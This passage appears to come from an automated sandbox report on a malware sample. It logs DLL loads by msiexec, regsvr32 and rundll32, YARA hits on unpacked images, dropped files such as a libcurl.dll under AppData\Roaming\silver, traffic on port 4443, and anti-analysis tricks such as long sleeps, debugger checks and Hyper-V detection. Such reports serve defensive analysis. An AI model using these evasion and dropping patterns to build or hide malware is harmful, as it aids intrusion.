                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

                  Data Obfuscation

                  Source: Yara match File source: 14.2.regsvr32.exe.6b610000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 6.2.regsvr32.exe.6b610000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 11.2.regsvr32.exe.6b610000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.2.rundll32.exe.4f80000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.2.rundll32.exe.6c330000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.2.rundll32.exe.4f80000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 6.2.regsvr32.exe.7f6d0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.2.rundll32.exe.7f290000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 4.2.rundll32.exe.7f290000.2.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 11.2.regsvr32.exe.7ebe0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 11.2.regsvr32.exe.7ebe0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 6.2.regsvr32.exe.7f6d0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.2943950120.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: C:\Users\user\AppData\Roaming\silver\libcurl.dll, type: DROPPED
                  Source: Yara match File source: C:\Users\user\8f08\813848\813848.winmd, type: DROPPED
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_7F2F1116 push ecx; ret 4_2_7F2F1129
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7F6FB37E push cs; retf 0002h 6_2_7F6FB37F
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7F731116 push ecx; ret 6_2_7F731129
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_7EC0B37E push cs; retf 0002h 11_2_7EC0B37F
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_7EC41116 push ecx; ret 11_2_7EC41129
                  Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\8f08\813848\813848.winmd
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI6890.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\silver\libcurl.dll
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI67E2.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI6850.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI68B0.tmp

                  Hooking and other Techniques for Hiding and Protection

                  Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 4443
                  Source: unknown Network traffic detected: HTTP traffic on port 4443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 4443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4443 -> 49829
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_4-45781
                  Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep graph_4-46312
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetAdaptersInfo, 4_2_7F2DB260
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\8f08\813848\813848.winmd
                  Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI6890.tmp
                  Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI67E2.tmp
                  Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI6850.tmp
                  Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI68B0.tmp
                  Source: C:\Windows\SysWOW64\regsvr32.exe API coverage: 5.4 %
                  Source: C:\Windows\SysWOW64\regsvr32.exe API coverage: 2.2 %
                  Source: C:\Windows\System32\msiexec.exe TID: 6316 Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\SysWOW64\rundll32.exe TID: 980 Thread sleep count: 53 > 30
                  Source: C:\Windows\SysWOW64\rundll32.exe TID: 980 Thread sleep time: -6890000s >= -30000s
                  Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_7F2DADB0 GetSystemInfo, 4_2_7F2DADB0
                  Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 130000
                  Source: rundll32.exe, 00000004.00000002.2943141043.0000000002D9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2943141043.0000000002DFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: rundll32.exe, 00000004.00000002.2943141043.0000000002DFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
                  Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_4-45755
                  Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_7F2F1417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_7F2F1417
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_7F2B9830 mov edx, dword ptr fs:[00000030h] 4_2_7F2B9830
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7F71AF60 mov eax, dword ptr fs:[00000030h] 6_2_7F71AF60
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71ADB0 mov edx, dword ptr fs:[00000030h]6_2_7F71ADB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6FE5A0 mov eax, dword ptr fs:[00000030h]6_2_7F6FE5A0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F727D90 mov ecx, dword ptr fs:[00000030h]6_2_7F727D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F727D90 mov edx, dword ptr fs:[00000030h]6_2_7F727D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F727D90 mov eax, dword ptr fs:[00000030h]6_2_7F727D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F727D90 mov ecx, dword ptr fs:[00000030h]6_2_7F727D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F6C70 mov edx, dword ptr fs:[00000030h]6_2_7F6F6C70
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F702420 mov edx, dword ptr fs:[00000030h]6_2_7F702420
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F702420 mov eax, dword ptr fs:[00000030h]6_2_7F702420
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F705CD0 mov ecx, dword ptr fs:[00000030h]6_2_7F705CD0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6FD370 mov edx, dword ptr fs:[00000030h]6_2_7F6FD370
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71D3E0 mov ecx, dword ptr fs:[00000030h]6_2_7F71D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71D3E0 mov eax, dword ptr fs:[00000030h]6_2_7F71D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71D3E0 mov ecx, dword ptr fs:[00000030h]6_2_7F71D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71D3E0 mov edx, dword ptr fs:[00000030h]6_2_7F71D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71D3E0 mov eax, dword ptr fs:[00000030h]6_2_7F71D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71E3A0 mov eax, dword ptr fs:[00000030h]6_2_7F71E3A0
